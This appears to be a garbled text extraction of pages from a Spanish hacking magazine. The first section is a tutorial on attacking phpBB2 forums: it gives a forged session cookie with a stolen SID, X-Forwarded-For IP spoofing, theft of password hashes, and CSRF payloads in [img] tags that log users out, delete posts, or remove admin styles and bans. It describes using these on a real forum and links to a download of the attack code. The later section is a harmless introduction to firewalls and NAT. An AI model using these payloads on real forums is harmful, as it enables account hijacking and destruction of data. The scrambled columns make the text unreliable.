phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:4:"3840";}; phpbb2mysql_sid=f0a98ea57ea60586a4eedd688e9c2d2f Por ultimo ponemos la IP en la cabecera X-ForWarded-For (out) … y el resto ya lo conocemos También, y como va siendo habitual, le puse unos cuantos cuadraditos.. sé que Te estarás preguntando si se pueden ya cambió su clave, pero por si acaso... hacer más cosas... pues sí... por ejemplo podemos sacar el hash de la contraseña Por si queda alguna duda, aquí te pongo y luego craquearla, aunque claro, después algunas capturas de “otro” foro, para que de esto no tiene mucho sentido perder no haya susceptibilidades, por si piensas Página 20 PC PASO A PASO Nº 22
  20. 20. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros que siendo uno de los administradores Moderando el foro... de hackxcrack tengo más posibilidades... Entrando en el foro “guiri”, “curiosamente” el usuario usurpado era un moderador Todo usando la misma técnica... claro, que para que puedas usar las Viendo la zona reservada para inyecciones SQL y averiguar los moderadores y administradores parámetros necesarios para el spoof, primero hay que registrarse... puesto que para usar los códigos anteriores hay que haber hecho login en el foro... a no ser... que se permita postear a los invitados. Terminando.... Si cambias la IP del X-Forwarded-For en el proxomitron y estás logueado en el foro... te desconectarás solito, porque el phpBB2 comprobará que tu IP ya no es la misma y caducará tu Los privados... qué cosas... sesión Para utilizar SQL inyection y HTML inyection debes estar logueado como usuario registrado, no sirve como invitado. Para spoofear un usuario con su IP y el SID robado, debes hacerlo como invitado y en una sesión nueva del navegador, en caso contrario no funcionará. PC PASO A PASO Nº 22 Página 21
  21. 21. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros Craquear los hashes en MD5 de las post que se haya indicado... SIN contraseñas puede ser una labor eterna... PREGUNTAS. si el usuario tiene un password de muchos caracteres y con combinaciones de letras, Los usuarios normales no pueden borrar números y signos, lo más probable es en la mayor parte de las ocasiones, pero que nos entierren a todos antes de si me pongo eso en la firma... seguro que sacarla. un administrador o moderador, tarde o temprano verá alguno de mis posts y se Ahh!! Y decías que se pueden borrar borrará el que yo quiera..... posts o “dirigir” a enlaces maliciosos... pues sí... este es otro bug, de lo más .... hombre... eso borraría un post... estúpido, pero sorprendentemente para eliminar muchos hay que poner dañino… cientos de imágenes y eso no es factible... ¿cómo puedo hacerlo "en Si ponemos esto: masa"? http://www.hackxcrack.com/phpBB2/lo Pues la respuesta la di en el hilo de "la gin.php?logout=true importancia de llamarse HTML", mas iframes y pinchamos en el link... nos desconecta... vaaaleee, eso es una gilipollez... nadie Es decir, me creo una web en cualquier pinchará en eso... pero.... ¿y si ponemos servidor..... y junto con mi bonita web, esto?: sus fotos, vídeos, etc... me creo esto: [img]http://www.hackxcrack.com /phpBB2/login.php?logout=true[/i mg] Pues parece lo mismo, pero no lo es.... el phpBB2 se hace la picha un lío y quiere mostrar esa imagen... no puede porque no lo es.... y lo ejecuta... o sea, que si ponemos eso como firma o como avatar... todos los que vean los post del usuario que tiene eso en su firma se Y no sigo por que ya lo cogéis, ¿no? o desconectarán del foro... más fácil un JavaScript y un bucle que vaya variando el valor de p P u e s p a ra b o r ra r p o s t i g u a l . . . . Pero hay más... también se pueden [img]http://www.hackxcrack.com usar estos /phpBB2/posting.php?mode=delet e&p=NUMERO_DE_POST_A_BORR /admin/admin_styles.php?mode=delete&style_id=numero AR&confirm=yes[/img] donde número será el estilo a borrar /admin/admin_words.php?mode=delete&id=número, Y cuando un administrador o un donde número será la palabra censurada a borrar moderador pase por ese hilo, borrará el Página 22 PC PASO A PASO Nº 22
  22. 22. Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros - Asaltando foros /admin/admin_smilies.php?mode=delete&id=número http://www.forohxc.com/bugforos/descarga.zip para los smilies Y el agradecimiento: /admin/admin_user_ban.php?mode=delete&id=número Agradecer la labor que mis compañeros para los baneados.... vamos, un desastre, han realizado, labores de vigilancia de verás... a más de uno le han fulminado intensiva para que esto no nos ocurriera el foro completito.... a nosotros, para todos los moderadores que son hoy, los que fueron... y para un Ahora sí... termino: dos cosas, otro enlace grupo “de oteadores” y “conejillos de y un agradecimiento especial indias” que nos ayudaron a mantener “el orden”, moebius, Yorkshire, mi querido y El enlace es para que os podáis descargar ultrajado Grullanetx.... buff, espero no todos los códigos expuestos, las webs dejarme a ninguno... pero todos sabéis maliciosas, los html inyection y sql a quienes me refiero.... inyection, que teclearlos es un rollo y GRACIAS!!!! seguro que nos equivocamos. Eso sí... cuidadito con lo que se hace... PC PASO A PASO Nº 22 Página 23
  23. 23. FIREwalls que son, como funcionan y como saltarselos Iniciamos un nuevo curso de lo mas "jugoso" No hace falta hacer una extensa presentación, simplemente te lo advertimos: NO ES UN CURSO QUE PUEDAS SALTARTE!!! Saludos de nuevo, amigo@s Por el momento nos conformamos con lo que hay... unos cuantos PC’s y los medios y Nuestro siguiente objetivo son los cortafuegos, dispositivos de red habituales, pero los Firewalls, esos “ilustres” conocidos y afrontaremos este hecho con los conocimientos desconocidos. Por el momento presentaré necesarios para construir un sistema eficaz algunas definiciones básicas, tipos de de seguridad. Tras “la serie” de IDS (publicada cortafuegos, su implementación, algunos en los anteriores números de la revista), ahora servicios característicos como NAT y PAT y hablaremos de Firewalls, proxys, gateways terminaremos el presente artículo con los y host bastión. accesos NO autorizados a redes. Para después de las vacaciones de verano, Definición y funciones de un tenemos una gran tarea, repartidos en varios Firewall artículos más: implementaremos Firewalls Comerciales, otros como IPTABLES y La función principal de un firewall consiste continuaremos con algunos artículos en examinar las comunicaciones que se interesantes a partir de Octubre como: establecen entre dos redes, permitirlas, rechazarlas e incluso redirigirlas. Redes Heterogéneas e Integración de Sistemas LiNUX-Windows Aunque se puede implementar soluciones Diseño y Tecnologías de Redes Privadas Firewalls en una única red, no es lo habitual. Virtuales Lo normal es que los Firewalls actúen como Redes WAN: ADSL, RTB, RDSI... centinelas de guardia evitando los accesos no Routers y Routing autorizados a cualquier otro dispositivo que protege, que puede ser un único host, unos Y terminaremos allá para final de año pocos o la red entera. convirtiendo nuestro PC (uno viejecito, no hace falta que sea una súper-máquina) en un Router ADSL tanto para Windows como Desde el punto de vista empresarial, una red para LiNUX, nada tendrá que envidiar a esos guarda datos e información valiosa, por ello “cacharros” del tipo CISCO, 3COM, Zyxel, se debe guardar la confidencialidad de sus etc. Hasta ofreceremos conectividad en datos, la integridad de los mismos y la diferentes tecnologías de redes, fibra, disponibilidad (el acceso) de las máquinas que ethernet, token y por su puesto.... INTERNET... la componen. hasta puede ser la tan vilipendiada XBOX que tantos disgustos y alegrías nos causó... Un Firewall es un dispositivo (o un conjunto ¿Convertir la Xbox en un router ADSL? Mmm, de ellos) de contención. Funciona dividiendo es una idea.... a fin de cuentas tiene una la red en varias zonas y evitando que el tráfico entrada ethernet y una conexión a Internet... generado entre o salga de cada zona y qué demonios... es un Pentium III con dependiendo de unas reglas establecidas. discoduro y todo Página 24 PC PASO A PASO Nº 22
  24. 24. Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls Cómo protegen la red los Firewalls Básicamente de cuatro formas: Filtrado de paquetes, puertos y servicios Puertas de enlace a aplicaciones (gateway y proxys de aplicación) Puertas de enlace entre circuitos (gateway y proxys SOCKS) Inspección de paquetes de estado. En este artículo haremos referencia a los Firewalls como un conjunto de uno o varios Ventajas e inconvenientes de los dispositivos que se encuentran entre redes Firewalls de confianza (como puede ser una LAN) y redes externas (como puede ser Internet). Sin un Firewall, las redes quedan expuestas con todos sus dispositivos y configuración de seguridad, es decir, si esos dispositivos ofrecen servicios al exterior, la seguridad de las transmisiones dependerá del propio sistema operativo de los equipos y de lo robusto que sea el servicio ofrecido. Sin un Firewall, la seguridad se basa totalmente en los hosts y cuanta más grande sea la red más complejo será mantener la seguridad individual de cada uno de ellos... Los Firewalls inspeccionan todo el tráfico ya sabes, murphy “acecha”, imagina una que fluye entre ambas redes y: empresa con 5 servidores web y un administrador parcheando los agujeros... Todas las comunicaciones deben pasar seguro que parchea todos menos uno por ellos Sólo permitirán el tráfico autorizado Pueden y deben resistir los ataques dirigidos contra ellos mismos ! Cuando hace... Un Firewall puede ser un router, un PC, un Cuando hace muchos años que te dedicas a la enseñanza, te das host específico diseñado para ello, una cuenta de algunas cosas realmente interesantes. Una a destacar combinación de todo lo anterior y también un es que las personas, cuando se acercan por primera vez a "la conjunto de máquinas que operan para informática", poseen una gran "inocencia". Creen que un ordenador preservar la seguridad en los accesos a la red es "algo" casi perfecto, que nunca se equivoca, que siempre hace y normalmente se ubican en los límites de la lo que le dices, etc. topología de la red, dentro del perímetro que se considera como “seguro”. Esa "inocencia" se pierde rápidamente a medida que tus conocimientos aumentan. Los ordenadores necesitan un Sistema En principio parece bastante fácil definir lo Operativo para funcionar, y ese sistema operativo está programado que es el perímetro de la red, sin embargo por personas, y las personas cometemos errores, y el resultado con la aparición de las redes privadas virtuales, es que los ordenadores funcionan "tan bien" como los humanos a veces, no es tarea fácil. hemos sido capaces de programarlos. PC PASO A PASO Nº 22 Página 25
  25. 25. Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls ¿A dónde queremos llegar con esta nota? Pues que si todo fuese Reglas generosas o demasiado permisivas perfecto los firewalls no existirían, todos y cada uno de los elementos que forman parte de una red serían elementos No pueden detener ataques si el tráfico invulnerables. no pasa por ellos... otra perogrullada... pero si el ataque se produce “desde dentro” Pero esta situación ideal está muy lejos de la realidad… para el Firewall no funcionará... bendito seas empezar el propio protocolo TCP/IP tiene imperfecciones, por lo tanto, cualquier elemento basado en él (por ejemplo Internet) IDS de mi corazón arrastra esas imperfecciones que deben ser "corregidas" por el Pueden convertirse en un embudo Sistema Operativo de turno, el cual también es imperfecto… disminuyendo la fiabilidad, el rendimiento entonces cualquier programa para un sistema operativo debe o la flexibilidad de la red. "corregir" (en la medida de lo posible) esas imperfecciones arrastradas del TCP/IP y del Sistema Operativo, y la cadena sigue Con Firewall o sin él, también hay que y sigue y sigue. asegurar los hosts, esto daría para muuuuchos artículos, pero como pautas a seguir: ¿El resultado? Pues que cuanto más sabes más cuenta te das del CAOS reinante. Cuanto más complejo más CAÓTICO y más Desactivar todos los servicios que no se medidas de seguridad necesitamos… si el mundo fuese perfecto… utilicen este artículo no existiría. Eliminar cuentas y grupos no necesarios Cambiar las contraseñas por defecto y Esto no quiere decir que al usar un Firewall cuentas predeterminadas podemos descuidar a los hosts, pero no cabe Reconfigurar el resto de servicios, NUNCA duda que la inclusión de un Firewall en la fiarse de los valores por omisión red ayuda a protegerla frente a un error y la Asegurar las funciones administrativas atención del administrador se centrará en Utilizar contraseñas seguras y fuertes una única máquina y no en todas... Estar al corriente de nuevas vulnerabilidades o suscribirse a alguna de ellas. Los puntos fuertes de un Firewall son: Aplicar los parches de seguridad Reforzar la política de seguridad Protección contra virus y troyanos Restringir el acceso a servicios específicos Educar a los usuarios de la red en el control de registros y alertas Son auditores excelentes Producen alertas y avisan de los sucesos Además cuando se implementa un Firewall que se producen es recomendable también: Control redundante, es decir, utilizar más Las desventajas o puntos débiles son: de uno y diferentes No ofrecen protección ante lo que está Implementar un IDS autorizado, jajaja, estarás sonriendo... Establecer una directiva de seguridad o qué perogrullada... míralo así: Imagina política de empresa un Firewall que protege a un Servidor Definir el propósito de la red Web, obviamente debe permitir el tráfico Supervisar los registros y alertas hacia el mismo o no ofrecemos servicio alguno, pero por lo general no protegerá Realizar auditorias y pruebas de comportamiento los ataques o explotación de Implementar una seguridad física y acceso vulnerabilidades del servidor web o contra a los medios, salas bajo llave, racks, acceso la aplicación en sí... HTML injection, bugs a puertos de consola, desactivar las bocas de conocidos, overflows.... etc.. switches que no se usen, etc.. Página 26 PC PASO A PASO Nº 22
  26. 26. Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls Diseño de redes con Firewalls Host Bastión Este apartado bien merece otro artículo Es un sistema que se utiliza como “punto específico, de hecho lo tendrá... en próximos fuerte” y con características de Firewall, en meses, pero por el momento tres conceptos muchas ocasiones es quien se lleva “las y tres implementaciones: bofetadas”, puede ser un PC, un router, un Zona desmilitarizada (DMZ) Firewall.... Host Bastión Gateways o puertas de enlace A menudo el host bastión es un sistema que NO REENVÍA direcciones IP entre Internet y Zona Desmilitarizada la Intranet, es decir, se puede acceder al mismo desde cualquiera de las dos partes La DMZ es una red completa que permite el pero NUNCA las dos redes intercambian datos tráfico entre Internet dentro o fuera de la directamente. Intranet y al mismo tiempo mantiene la seguridad en la propia Intranet. Es como el recibidor de una casa, “los de fuera” vienen pero no pasan al salón, nos visitan, los atendemos y los despedimos... no usarán ni la cocina, ni el cuarto de baño. “Los de dentro”, pueden atravesarlo para salir a la calle o permanecer en el recibidor, pero sin comprometer las otras dependencias de la casa, una DMZ es como un buffer entre Internet y nuestra red. La DMZ contiene servidores y dispositivos de comunicaciones de capas 2 y 3 (switches, Puertas de enlace routers, Firewalls...) Los servidores están conectados DENTRO de Normalmente es un router que actúa como la DMZ y pueden ser proxys, servidores de Firewall y como router, opera con filtros de acceso remoto, VPN, correo, F TP... paquete para bloquear tráfico IP, TCP, UDP que no esté autorizado, también otros protocolos pero casi siempre con reglas “simples” de puertos y servicios despreocupándose del contenido del tráfico en sí mismo, comúnmente a ese conjunto de reglas se les denomina ACL’s (Listas de acceso) Todas estas definiciones, conceptos e implementaciones en ocasiones pueden confundirte, sobre todo en diseños de red pequeños, en estos casos nos encontramos con un “todo en uno”, imagina una pequeña empresa con 30 ó 40 máquinas, con una conexión ADSL contratada con un proveedor PC PASO A PASO Nº 22 Página 27
  27. 27. Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls y ofreciendo servicios WEB en un equipo Aunque las capacidades de filtrado han cualquiera de su red corporativa. En este caso mejorado mucho, habitualmente se limitan a el router que instala el proveedor LO ES TODO, denegar o permitir el tráfico por puerto, servicio bueno, realmente no hay DMZ. o protocolo pero no revisan el contenido de los paquetes de datos, se limitan a inspeccionar Observa que en el ejemplo anterior, las cabeceras, no los datos que se transportan. comprometer el servidor web significaría comprometer toda la red interna, idem si se Sin embargo son muy útiles cuando se consigue comprometer el router, aunque no combinan con un Firewall, puesto que a este se disponga de acceso a los equipos internos último ya le llegan los paquetes filtrados por desde el exterior, comprometer cualquiera de el router y no tiene que ocuparse de todo el esos dos dispositivos amenazaría la seguridad tráfico, con lo que aumenta el rendimiento de de todos los demás. los cortafuegos. Firewall basados en host Implementación y Tipos de Firewall Pues un Firewall que protege a un ÚNICO host, son soluciones económicas y fiables si Fundamentalmente podemos distinguir: en nuestra red disponemos de pocas máquinas ofreciendo servicios, si por el contrario son Firewall de red basados en host muchos, la labor administrativa de mantener Firewall basados en routers individualmente cada uno es muy elevada. Firewall basados en host Firewall de equipos Normalmente son software que se instalan en los sistemas operativos anfitriones, como Zone Como ves, muy parecido a los diferentes tipos Alarm, Kerio, etc.. de IDS, puede confundirte el primero, el Firewall de equipos segundo y el tercero... parecen lo mismo, pero no lo son... pasemos a describirlos: En este tipo se encuadran dispositivos que tienen hardware y software propio y optimizado Firewalls de red basados en Host para la función que desempeñan, es decir, son como los Firewalls de red basados en host Protegen redes completas y se instalan sobre pero con independencia del sistema operativo Sistemas Operativos como Windows, LiNUX, anfitrión. Son auténticos ordenadores Solaris, etc. especializados en labores de Firewall. Además suelen reforzar la pila de protocolos Entre los más conocidos tenemos los Pixware TCP/IP del propio sistema operativo, modifican de Cisco, Firewalls de 3COM, Nokia, etc... los archivos de inicio, entradas al registro y También los podemos llamar Firewalls agregan nuevos procesos. Hardware y, por cierto, suelen ser bastante Entre los más conocidos y nombrados están, caros. el conjunto IPTABLES del núcleo de LiNUX, Servicio de Traducción de soluciones del tipo StonesGate, FW-1 de Checkpoint, etc... Direcciones de Red (NAT) No podemos continuar y entender el Firewalls basados en routers funcionamiento de un Firewall, un router o Los routers son la primera capa de protección una puerta de enlace tipo proxy si no y en redes pequeñas se utilizan como comprendemos y entendemos bien qué es eso Firewalls. del NAT. Página 28 PC PASO A PASO Nº 22
  28. 28. Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls - Firewalls NAT permite “enmascarar” un conjunto de los cinco se la envía si todos son 2.2.2.2? direcciones IP (una o varias redes o subredes completas) bajo una única dirección IP o bajo Pongamos otro ejemplo. Supongamos los unas pocas. equipos 192.168.0.1 (PC-1) y 192.168.0.5 (PC-5) acceden al servidor de google para Para empezarlo a entender... imaginemos un efectuar una búsqueda... cibercafé con 50 ordenadores conectados a Internet, una forma de conectarlos sería Supongamos que NAT es un servicio que contratar 50 Ip’s públicas a un proveedor o realiza el router del ciber café (192.168.0.254) incluso de conexiones ADSL para cada y traduce las direcciones de los PC’s 1 y 5 en ordenador, así todos “salen” a Internet. la ip global 2.2.2.2 Como supondrás (y supones bien) eso, El router del ciber conoce las IP’s de los Pc’s además de ser carísimo, no es la solución pero el Server de google recibe DOS peticiones que elegirá el propietario del ciber, en su que vienen de la misma IP (2.2.2.2). Cuando lugar, asignará direcciones IP privadas a cada el servidor de Google emite la respuesta a PC y contratará una o varias IP’s públicas. las búsquedas de los usuarios que hay sentados en los PC’s 1 y 5, envía las respuestas a la Para simplificar el ejemplo, supongamos que ip 2.2.2.2, son cinco ordenadores con sus cinco IP’s privadas y una única dirección pública. Imaginemos.... PC-1 192.168.0.1 El usuario del PC1 busca “perros” en google PC-2 192.168.0.2 y el usuario del PC-5 busca “gatos”.... los PC-3 192.168.0.3 resultados de esas búsquedas los envía google PC-4 192.168.0.4 a la IP pública 2.2.2.2 (router del ciber) PC-5 192.168.0.5 ROUTER 192.168.0.254 ¿Cómo puede saber el router del ciber que las IP pública asignada por el proveedor 2.2.2.2 respuestas de las páginas de perros son para el PC-1 y las de los gatos para el PC-5 si lo La función de NAT en la red del cibercafé único que recibe es una respuesta dirigida a será convertir las IP’s Privadas de los 5 PC’s la 2.2.2.2 y no a las IP’s reales que originaron en la IP pública asignada por el ISP (2.2.2.2). las búsquedas? Hablando claro, imagina que los cinco PC´s acceden al mismo tiempo a Pues muy sencillo... cuando NAT se activa, el www.mocosoft.com, pues bien, el servidor router del ciber construye una tabla (la tabla de Mocosoft recibirá cinco conexiones de la NAT) que relaciona las IP’s internas con los IP 2.2.2.2. Para el servidor de Mocosoft existe puertos que abrieron los PC’s un solo PC que tiene la IP 2.2.2.2 y que se correspondientes... por ejemplo así: ha conectado cinco veces. Como vemos, la primera ventaja de NAT es que ofrece cierta privacidad, el servidor remoto no sabe la IP real (IP privada), sólo conoce la ip pública. Cuando google “responde” lo hace a la IP Pero no todo son parabienes.... ¿qué ocurre 2.2.2.2 con destino al puerto 1122 ó 1036, con el tráfico de vuelta? ¿Cuándo el servidor de tal forma que cuando regresan los remoto devuelva los resultados, a quién de resultados al router, éste no tiene más que PC PASO A PASO Nº 22 Página 29

×